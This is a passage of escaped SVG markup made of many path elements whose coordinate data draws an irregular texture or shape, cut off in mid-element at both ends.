d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path 